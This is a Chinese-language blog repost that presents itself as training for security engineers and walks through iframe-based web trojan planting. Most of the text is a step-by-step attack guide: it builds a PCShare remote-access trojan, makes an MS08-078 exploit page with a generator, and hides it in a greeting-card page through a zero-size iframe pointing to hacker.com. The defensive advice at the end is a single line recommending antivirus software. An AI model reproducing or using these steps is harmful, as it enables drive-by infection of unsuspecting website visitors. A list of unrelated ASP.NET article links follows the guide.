了解什么是IFRAME ASP.NET
2012-10-22 12:02
190 查看
了解什么是IFRAME ASP.NET
安全工程师,要能独立负责网站安全、局域网安全、服务器安全等,要了解网页挂马有IFRAME框架挂马、JS文件挂马、伪装挂马、CSS挂马、ActiveX组件挂马等方式,这样才可以有针对性地进行防范,避免网站和服务器等安全威胁。下面,我们来迈出成长为安全工程师的第一步,掌握IFRAME框架挂马的底细以及相应的防范方法。 什么是IFRAME框架挂马 网页挂马到如今已经发展出许多方法与应用手段,其中IFRAME网页框架挂马是最典型的挂马方式,也是最基本的挂马方式,可以说没有IFRAME,网页木马中有一多半就无法很好地隐藏,让用户在不察觉中受到攻击。 什么是IFRAME?IFRAME是一个非常普通的HTML语言标记,它主要用来在一个网页界面中,划分出左右或者上下的框架,就如同我们电视机的画中画效果一样。图2中的山寨搜索引擎的界面就是典型的IFRAME的引用。 但是IFRAME功能也被黑客巧妙地利用了,黑客在一些看似正常的网页中,使用长宽为0的隐藏框架,让用户在不知不觉中打开含有漏洞溢出内容的网页木马,这种手法就如同在画中画电视中打开了一个收费频道,但是由于收费频道的画面尺寸被恶意修改成了0,所以看电视的人并不知道自己已经打开了收费频道,虽然他并没有看到,但是事实上收费频道却的确在播放,而且会收取用户的使用费。 IFRAME框架挂马实战 下面我们来做个演示,看看IFRAME框架挂马到底是怎么做的。 第一步:准备一款得心应手的木马,例如PCShare,这款软件在设置上非常简单,易于操作上手。设置好相关服务,最后生成木马所用的服务控制端。 第二步:使用FTP将木马上传到自己的网站空间中,并用记事本记录下木马的网络路径。然后再用《MS08-078网页木马生成器》,生成一个带有MS08-078漏洞的恶意网页。找一个正常的新年贺卡网页,将该网页保存到自己指定的目录中,然后使用Web Designer或Dreamweaver网页编辑软件对保存的网页进行调整修改,然后上传到自己的网站空间中,看图片等内容是否能够正常显示。 第三步:再一次打开修改好的贺卡网页,使用IFRAME标记语句,将生成好的MS08-078网页嵌入到贺卡网页中,嵌入挂马代码如下: <iframe src=http://www.hacker.com/ms08078.html width=0 height=0>iframe> 将这段代码插入到贺卡网页之中后,就完成了我们的网页挂马操作。浏览贺卡网页的用户,在看到贺卡页面之后,也随之运行了保存在指定位置“http://www.hacker.com/ms08078.html”的漏洞溢出页面,但是由于它的长和宽都为“0”,观看贺卡网站的用户不会看到溢出页面。 对于IFRAME标记这种利用正常HTML语言功能实现隐藏的挂马方式,目前并没有好的防范方法,因为它是正常的网页功能。大家只能够寄希望于杀毒软件和防挂马软件阻止利用IFRAME标记内嵌的溢出病毒网页。我们建议在安装杀毒软件之后,能够安装第三方防挂马软件作为补充,例如锐甲、360 等。以上介绍什么是IFRAME。 |
相关文章推荐
- 学习ASP.NET Core,怎能不了解请求处理管道[1]: 中间件究竟是个什么东西?
- 学习ASP.NET Core,怎能不了解请求处理管道[1]: 中间件究竟是个什么东西?
- 在ASP.NET中使用IFRAME+DIV,可以实现在同一页面使用弹出(模态)窗口
- 学习ASP.NET Core, 怎能不了解请求处理管道[6]: 管道是如何随着WebHost的开启被构建出来的?
- ASP.NET 辅助进程 aspnet_wp.exe 和w3wp.exe 是什么?
- Asp.net 获取客户端IP地址的方法,有什么不一样?
- asp.net是什么?asp.net、vb.net跟c#net有什么区别(转载)
- ASP.NET Button跳转指定的iframe问题
- 新手必须了解的ASP.NET语句
- 了解 ASP.NET AJAX 调试功能(六)
- asp.net中iframe详细用法
- C# .NET ASP.NET 其中关系你了解多少
- 什么是 asp.net-
- asp.net中,<%#%>,<%=%>和<%%>分别是什么意思,有什么区别
- (翻译)从底层了解ASP.NET体系结构
- ASP.NET中Global.asax 文件是什么? .
- [翻译]了解ASP.NET底层架构(四)
- asp.net ajax是什么
- 黑马程序员之ASP.NET学习笔记:.NET,ASP.NET,C#,VisualStudio之间的关系是什么?
- asp.net中网页间传递参数用什么方法比较